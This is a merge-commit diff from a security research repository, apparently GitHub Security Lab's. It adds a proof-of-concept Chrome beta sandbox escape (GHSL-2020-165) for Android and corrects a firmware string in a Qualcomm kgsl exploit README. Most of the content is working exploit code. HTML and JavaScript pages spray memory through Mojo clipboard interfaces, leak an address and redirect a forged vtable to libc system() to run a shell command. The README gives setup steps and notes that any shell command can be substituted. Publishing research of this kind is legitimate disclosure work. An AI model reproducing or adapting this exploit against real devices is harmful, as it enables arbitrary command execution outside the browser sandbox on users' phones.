Merge pull request #313 from m-y-mo/chrome_sbx

Blog Material

Author: xcorail

SecurityExploits/Android/Qualcomm/CVE-2020-11239/README.md

@@ -2,7 +2,7 @@
 
 The write up can be found [here](https://securitylab.github.com/research/one_day_short_of_a_fullchain_android). This is a bug in the Qualcomm kgsl driver I reported in July 2020. The GitHub Advisory can be found [here](https://securitylab.github.com/advisories/GHSL-2020-375-kgsl). The bug can be used to gain arbitrary kernel code execution, read and write from the untrusted app domain.
 
-The exploit is tested on Samsung Galaxy A71 with firmware version A715FXXUATJ2, Baseband A715FXXU3ATI5 and Kernel version 4.14.117-19828683. The offsets in the exploit refers to that version of the firmware. For different models of phones, the macro `DMA_ADDRESS`, which indicates the address of the SWIOTLB buffer, will also need to be changed.
+The exploit is tested on Samsung Galaxy A71 with firmware version A715FXXU3ATJ2, Baseband A715FXXU3ATI5 and Kernel version 4.14.117-19828683. The offsets in the exploit refers to that version of the firmware. For different models of phones, the macro `DMA_ADDRESS`, which indicates the address of the SWIOTLB buffer, will also need to be changed.
 
 The exploit is reasonably reliable, although it does need to wait a few minutes after start up, after the kernel activities settled down before running.
 

SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/README.md

@@ -0,0 +1,37 @@
+## Chrome Beta Sandbox Escape GHSL-2020-165
+
+The write up can be found [here](https://securitylab.github.com/research/one_day_short_of_a_fullchain_sbx). This is a bug in the beta version of Chrome v86 I reported in September 2020. The GitHub Advisory can be found [here](https://securitylab.github.com/advisories/GHSL-2020-165-chrome) and the Chrome issue Chrome Issue [here](https://bugs.chromium.org/p/chromium/issues/detail?1125614). The bug can be used to escape the Chrome sandbox from a compromised renderer.
+
+The exploit is tested on the 64 bit beta version 86.0.4240.30 of Chrome with the following build config (`args.gn`):
+
+```
+target_os = "android"
+target_cpu = "arm64"
+is_java_debug = false
+is_debug = false
+symbol_level = 1
+blink_symbol_level = 1
+```
+
+The exploit is tested on Samsung Galaxy A71 with firmware version A715FXXU3ATJ2, Baseband A715FXXU3ATI5 and Kernel version 4.14.117-19828683. The offsets in the exploit assume this version of the firmware. For other firmware, use the offsets in the corresponding libraries `libhwui.so` and `libc.so` under `system/lib64`. (64 bit) It requires production firmware on the phone and would fail on emulators and phones with development firmware (i.e. OS built from AOSP source) The actual offsets of these libraries also needs to be updated to the ones obtained from the compromised renderer.
+
+It should succeed most of the time and rarely crash. If successful, it'll run the shell command in the `command` variable in the file `payment_request_clip.html`, which would create a file called `pwn` under the directory `/data/data/org.chromium.chrome/`. It can be replaced with other shell commands.
+
+To test, check out version 86.0.4240.30 of Chrome following [these instructions](https://chromium.googlesource.com/chromium/src/+/master/docs/android_build_instructions.md), then apply the file `sbx.patch` to the simulate a compromised renderer. Then build the `chrome_public_apk` target.
+
+Install the resulting apks (under `out/<target>/apks`) on the phone using `adb`, then enable the `MojoJS` feature to simulate a compromised renderer:
+
+1. Enable `Enable command line on non-rooted devices` from `chrome://flags`
+2. Create a file in `/data/local/tmp/chrome-command-line` in the phone and then add `chrome --enable-blink-features=MojoJS` to the file
+3. Force stop Chrome and restart
+
+Then create a directory to host the `html` files included in this directory, and run `copy_mojo_js_bindings.py` to copy the mojo bindings to the directory and host the files on localhost:
+
+```
+python ./copy_mojo_js_bindings.py /path/to/chrome/../out/<target>/gen
+python -m SimpleHTTPServer
+```
+
+Then open the page `payment_request_clip.html` from Chrome on the device. The easiest way is to use the `chrome://inspect/#devices` tool to set up the proxies etc. and open the url.
+
+If successful, the shell command will run and a file called `pwn` will be created in the directory `/data/data/org.chromium.chrome/` in the phone. If failed, click on the link to reload the page and try again (can't use reload for this one). It shouldn't need too many retries to succeed.

SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/copy_mojo_js_bindings.py

@@ -0,0 +1,20 @@
+#! /usr/bin/python
+
+import os
+import shutil
+import sys
+
+base_path = sys.argv[1]
+for path, dirs, files in os.walk(base_path):
+  for file in files:
+    if file == 'mojo_bindings.js':
+      shutil.copyfile(os.path.join(path, file), os.path.join('./', file))
+    
+    if file.endswith('.mojom.js'):
+      target_path = os.path.join('./', path[len(base_path) + 1:])
+      try:
+        os.makedirs(target_path)
+      except:
+        pass
+      shutil.copyfile(os.path.join(path, file), os.path.join(target_path, file))
+

SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/payment_request_clip.html

@@ -0,0 +1,192 @@
+<html>
+  <head>
+    <script src="mojo_bindings.js"></script>
+    <script src="third_party/blink/public/mojom/clipboard/clipboard.mojom.js"></script>
+    <script>
+      //Change these to the actual value before running
+      const libhwuiOffset = 0x75d8dd4000n;
+      const libcOffset = 0x75d962c000n;
+      //Points to Execute in libwebp, offset from libhwui
+      const executeOffset = 0x7db9a0n;
+      const bitWriterOffset = 0x803e30n;
+
+      //Offset to system in libc
+      const systemOffset = 0x925b0n;
+ 
+      //The offset of GetRoutingID in rfh's vtable
+      const getRoutingIDOffset = 0x48n;
+      const ifrmUrl = 'payment_request_clip2.html';
+      const jamUrl = 'payment_request_jam_clip.html';
+
+      const reloadUrl = 'payment_request_clip.html';
+
+      const command = 'touch /data/data/org.chromium.chrome/pwn';
+      //Up to 32 bytes maybe written by bit writer.
+      const commandOffset = 0x28;
+      clipboards = [];
+      dataClipboards = [];
+      images = [];
+
+
+	  function sleep(miliseconds) {
+	    var currentTime = new Date().getTime();
+	    while (currentTime + miliseconds >= new Date().getTime()) {
+	    }
+	  }
+
+      function computeAddress(image1, image2) {
+        let addrBuffer = new ArrayBuffer(8);
+        let addrIntView = new Uint8Array(addrBuffer);
+        for (let i = 8; i < 8 + 5; i++) {
+          if (i != 11) {
+            addrIntView[i - 8] = image1[i];
+          } else {
+            addrIntView[i - 8] = image2[i];
+          }
+        }
+        let addrBigIntView = new BigUint64Array(addrBuffer);
+        return addrBigIntView[0];
+      }
+
+      function createIframe(id, src) {
+	    let iframe = document.createElement('iframe');
+	    iframe.style.display="none";
+	    iframe.setAttribute('id', id);
+        if (src !== undefined) {
+	      iframe.src = src;
+        }
+	    document.body.appendChild(iframe);
+      }
+       
+      function removeIframe(id) {
+	    let frame = document.getElementById(id);
+	    frame.parentNode.removeChild(frame);
+      }
+
+      function runCommand(addr) {
+        window.location = reloadUrl + '?addr=' + addr.toString();
+      }
+
+      function readClipboard() {
+        clipboards[0].commitWrite();
+        sleep(1000);
+        clipboards[0].readImage(1).then(readImg);
+        sleep(500);
+        clipboards[1].commitWrite();
+        sleep(1000);
+        clipboards[1].readImage(1).then(readImg);
+      }
+
+      function readImg(image) {
+        if (image.image === null) {
+          console.log('Failed to obtain read clipboard');
+          window.location = reloadUrl;
+        }
+        let imageData = new Uint8Array(image.image.pixelData.bytes);
+        images.push(imageData);
+        if (images.length == 2) {
+          let addr = computeAddress(images[0], images[1]);
+          if (addr < 0xffffffffn) {
+            console.log('Failed to obtain address: ' + addr.toString(16));
+            window.location = reloadUrl;
+          }
+          console.log('addr: ' + addr.toString(16));
+          runCommand(addr);
+        }
+      }
+
+      function readAddress(bitmap1, bitmap2) {
+        createIframe('ifrm', ifrmUrl);
+        createIframe('ifrm1', ifrmUrl);
+        createIframe('jam', jamUrl);
+        setTimeout(()=> {
+          removeIframe('ifrm');
+          clipboards[0].writeImage(bitmap1);
+          removeIframe('ifrm1');
+          clipboards[1].writeImage(bitmap2);
+          dataClipboards[29].ptr.reset();
+          dataClipboards[30].ptr.reset();
+          setTimeout(readClipboard, 3000);
+        }, 3000);
+      }
+
+      function createBitmap(alphaType, width, vtable) {
+        let data = new ArrayBuffer(width * width * 4);
+        if (vtable !== undefined) {
+          let view = new BigUint64Array(data);
+          view[0] = vtable;
+        }
+        let colorSpace = new Array(9);
+        let imageInfo = new skia.mojom.ImageInfo();
+        imageInfo.colorType = 4;
+        imageInfo.alphaType = alphaType;
+        imageInfo.serializedColorSpace = colorSpace;
+        imageInfo.width = width;
+        imageInfo.height = width;
+        let bigBuffer = new mojoBase.mojom.BigBuffer();
+        bigBuffer.bytes = new Uint8Array(data);
+        let bitmap = new skia.mojom.Bitmap();
+        bitmap.imageInfo = imageInfo;
+        bitmap.rowBytes = width * 4;
+        bitmap.pixelData = bigBuffer;
+        return bitmap;
+      }
+
+      function createClipboards(n, clipboardArr) {
+        for (let i = 0; i < n; i++) {
+          let clipboard_ptr = new blink.mojom.ClipboardHostPtr();
+          Mojo.bindInterface(blink.mojom.ClipboardHost.name,
+                            mojo.makeRequest(clipboard_ptr).handle);
+          clipboardArr.push(clipboard_ptr);
+        }
+      }
+
+
+      function sprayCommand() {
+        let dataBitmap = createBitmap(1, 16);
+        let data = dataBitmap.pixelData.bytes;
+        for (let i = 0; i < command.length; i++) {
+          data[commandOffset + i] = command.charCodeAt(i);
+        }
+        for (let i = 0; i < dataClipboards.length; i++) {
+          dataClipboards[i].writeImage(dataBitmap);
+        }
+      }
+
+      function load() {
+        let addrIdx = window.location.href.search('addr');
+        if (addrIdx == -1) {
+          let vtable = libhwuiOffset + bitWriterOffset - getRoutingIDOffset;
+          createClipboards(2, clipboards);
+          createClipboards(32, dataClipboards);
+          sprayCommand();
+          let bitmap1 = createBitmap(1, 32, vtable);
+          let bitmap2 = createBitmap(2, 32, vtable);
+          readAddress(bitmap1, bitmap2);
+        } else {
+          createClipboards(1, clipboards);
+          sleep(2000);
+          let addr = BigInt(window.location.href.substring(addrIdx + 5));
+          if (addr == 0) {
+            window.location = reloadUrl;
+          }
+          let vtable = libhwuiOffset + executeOffset - getRoutingIDOffset;
+          let bitmap = createBitmap(1, 32, vtable);
+          //fake WebPWorker
+          let view = new BigUint64Array(bitmap.pixelData.bytes.buffer);
+          view[2] = libcOffset + systemOffset;
+          view[3] = addr + BigInt(commandOffset);
+          createIframe('ifrm', ifrmUrl);
+          createIframe('jam', jamUrl);
+          setTimeout(() => {
+            removeIframe('ifrm');
+            clipboards[0].writeImage(bitmap);
+            console.log('done');
+          }, 3000);
+        }
+      }
+  </script>
+  <body onload="load()">
+    <a href="payment_request_clip.html">reload</a>
+  </body>
+</html>

SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/payment_request_clip2.html

@@ -0,0 +1,22 @@
+<html>
+  <body>
+  	<script>
+		  var supportedInstruments = [{
+			 supportedMethods: 'secure-payment-confirmation',
+             data: {'credentialIds' : [new ArrayBuffer(4)], 'fallbackUrl' : 'localhost:8000', 'networkData' : new ArrayBuffer(4),
+                    }
+			}];
+
+		  var details = {
+		    total: {
+		      label: 'Total',
+		      amount: { currency: 'USD', value : '55.00' }
+		    }
+		  };
+		  var options = {};
+          for (let i = 0; i < 0x1; i++) {
+      		var request = new PaymentRequest(supportedInstruments, details, options);
+          }
+  	</script>
+  </body>
+</html>

SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/payment_request_jam_clip.html

@@ -0,0 +1,9 @@
+<html>
+  <body>
+  	<script>
+          for (let i = 0; i < 0x800; i++) {
+            PublicKeyCredential.isUserVerifyingPlatformAuthenticatorAvailable();
+          }
+  	</script>
+  </body>
+</html>

SecurityExploits/Chrome/SandboxEscape/GHSL-2020-165/sbx.patch

@@ -0,0 +1,16 @@
+diff --git a/third_party/blink/renderer/modules/payments/payment_request.cc b/third_party/blink/renderer/modules/payments/payment_request.cc
+index b0975c59ddb5..a2d7c273950c 100644
+--- a/third_party/blink/renderer/modules/payments/payment_request.cc
++++ b/third_party/blink/renderer/modules/payments/payment_request.cc
+@@ -439,9 +439,9 @@ void StringifyAndParseMethodSpecificData(ExecutionContext& execution_context,
+   if (supported_method == "basic-card") {
+     BasicCardHelper::ParseBasiccardData(input, output->supported_networks,
+                                         exception_state);
+-  } else if (supported_method == kSecurePaymentConfirmationMethod &&
++  } else if (supported_method == kSecurePaymentConfirmationMethod/* &&
+              RuntimeEnabledFeatures::SecurePaymentConfirmationEnabled(
+-                 &execution_context)) {
++                 &execution_context)*/) {
+     UseCounter::Count(&execution_context,
+                       WebFeature::kSecurePaymentConfirmation);
+     output->secure_payment_confirmation =